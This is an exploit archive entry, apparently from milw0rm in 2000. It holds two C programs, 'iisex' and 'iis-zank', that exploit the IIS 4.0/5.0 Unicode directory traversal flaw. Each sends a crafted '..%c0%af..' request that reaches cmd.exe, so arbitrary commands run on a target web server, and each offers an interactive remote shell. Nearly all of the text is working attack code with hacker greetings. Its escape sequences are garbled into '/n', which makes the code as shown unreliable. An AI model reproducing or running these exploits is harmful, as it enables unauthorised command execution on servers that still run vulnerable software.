/* iisex iis exploit (<- nost's idea) v2 * -------------------------------------- * Okay.. the first piece of code was not really finished. * So, i apologize to everybody.. * * by incubus <incubus@securax.org> * * grtz to: Bio, nos, zoa, reg and vor... (who else would stay up * at night to exploit this?) to securax (#securax@efnet) - also * to kim, glyc, s0ph, tessa, lamagra and steven. */ #include <netdb.h> #include <netinet/in.h> #include <sys/types.h> #include <sys/socket.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <errno.h> int main(int argc, char **argv){ char buffy[666]; /* well, what else? I dunno how long your commands are.. */ char buf[500]; char rcvbuf[8192]; int i, sock, result; struct sockaddr_in name; struct hostent *hostinfo; if (argc < 2){ printf ("try %s www.server.com/n", argv[0]); printf ("will let you play with cmd.exe of an IIS4/5 server./n"); printf ("by incubus <incubus@securax.org>/n/n"); exit(0); } printf ("/niisex - iis 4 and 5 exploit/n---------------------------/n"); printf ("act like a cmd.exe kiddie, type quit to quit./n"); for (;;) { printf ("/n[enter cmd> "); gets(buf); if (strstr(buf, "quit")) exit(0); i=0; while (buf[i] != '/n'){ if(buf[i] == 32) buf[i] = 43; i++; } hostinfo=gethostbyname(argv[1]); if (!hostinfo){ herror("Oops"); exit(-1); } name.sin_family=AF_INET; name.sin_port=htons(80); name.sin_addr=*(struct in_addr *)hostinfo->h_addr; sock=socket(AF_INET, SOCK_STREAM, 0); result=connect(sock, (struct sockaddr *)&name, sizeof(struct sockaddr_in)); if (result != 0) { herror("Oops"); exit(-1); } if (sock < 0){ herror("Oops"); exit(-1); } strcpy(buffy,"GET /scripts/../%c0%af../winnt/system32/cmd.exe?/c+"); strcat(buffy,buf); strcat(buffy, " HTTP/1.0/n/n"); send(sock, buffy, sizeof(buffy), 0); recv(sock, rcvbuf, sizeof(rcvbuf), 0); printf ("%s", rcvbuf); close(sock); } }

/****************************************************************************/ ** ** ** Microsoft IIS 4.0/5.0 Extended UNICODE Directory Traversal Exploit ** ** proof of theory exploit cuz it's wednesday and i'm on the couch ** ** ** ** brought to you by the letter B, the number 7, optyx, and t12 ** ** optyx - <optyx@uberhax0r.net optyx@newhackcity.net> ** ** t12 - <t12@uberhax0r.net> ** ** ** ** greetz go out to aempirei, a gun toatin' gangstah' hustler' player ** ** motherfucker who isn't with us anymore, miah, who's GTA2 game was ** ** was most entertaining tonight, Cathy, who provided the trippy light ** ** to stare at, and to KT, for providing me with hours of decent ** ** conversation. ** ** ** /****************************************************************************/ #include <stdio.h> #include <netdb.h> #include <stdlib.h> #include <string.h> #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <arpa/inet.h> #include <signal.h> #include <errno.h> #include <fcntl.h> void usage(void) { fprintf(stderr, "usage: ./iis-zank <-t target> <-c 'command' or -i>"); fprintf(stderr, " [-p port] [-t timeout]/n"); exit(-1); } int main(int argc, char **argv) { int i, j; int port=80; int timeout=3; int interactive=0; char temp[1]; char host[512]=""; char cmd[1024]=""; char request[8192]="GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+"; struct hostent *he; struct sockaddr_in s_addr; printf("iis-zank_bread_chafer_8000_super_alpha_hyper_pickle.c/n"); printf("by optyx and t12/n"); for(i=0;i<argc;i++) { if(argv[i][0] == '-') { for(j=1;j<strlen(argv[i]);j++) { switch(argv[i][j]) { case 't': strncpy(host, argv[i+1], sizeof(host)); break; case 'c': strncpy(cmd, argv[i+1], sizeof(cmd)); break; case 'h': usage(); break; case 'o': timeout=atoi(argv[i+1]); break; case 'p': port=atoi(argv[i+1]); break; case 'i': interactive=1; break; default: break; } } } } if(!strcmp(host, "")) { fprintf(stderr, "specify target host/n"); usage(); } if(!strcmp(cmd, "") && !interactive) { fprintf(stderr, "specify command to execute/n"); usage(); } printf("]- Target - %s:%d/n", host, port); if(!interactive) printf("]- Command - %s/n", cmd); printf("]- Timeout - %d seconds/n", timeout); if((he=gethostbyname(host)) == NULL) { fprintf(stderr, "invalid target/n"); usage(); } do { if(interactive) { cmd[0]=0; printf("/nC> "); if(fgets(cmd, sizeof(cmd), stdin) == NULL) fprintf(stderr, "gets() error/n"); cmd[strlen(cmd)-1]='/0'; if(!strcmp("exit", cmd)) exit(-1); } for(i=0;i<strlen(cmd);i++) { if(cmd[i]==' ') cmd[i]='+'; } strncpy(request, "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+", sizeof(request)); strncat(request, cmd, sizeof(request) - strlen(request)); strncat(request, "/n", sizeof(request) - strlen(request)); s_addr.sin_family = PF_INET; s_addr.sin_port = htons(port); memcpy((char *) &s_addr.sin_addr, (char *) he->h_addr, sizeof(s_addr.sin_addr)); if((i=socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) { fprintf(stderr, "cannot create socket/n"); exit(-1); } alarm(timeout); j = connect(i, (struct sockaddr *) &s_addr, sizeof(s_addr)); alarm(0); if(j==-1) { fprintf(stderr, "cannot connect to %s/n", host); exit(-1); close(i); } if(!interactive) printf("]- Sending request: %s/n", request); send(i, request, strlen(request), 0); if(!interactive) printf("]- Getting results/n"); while(recv(i,temp,1, 0)>0) { alarm(timeout); printf("%c", temp[0]); alarm(0); } } while(interactive); close(i); return 0; }

# milw0rm.com [2000-11-18]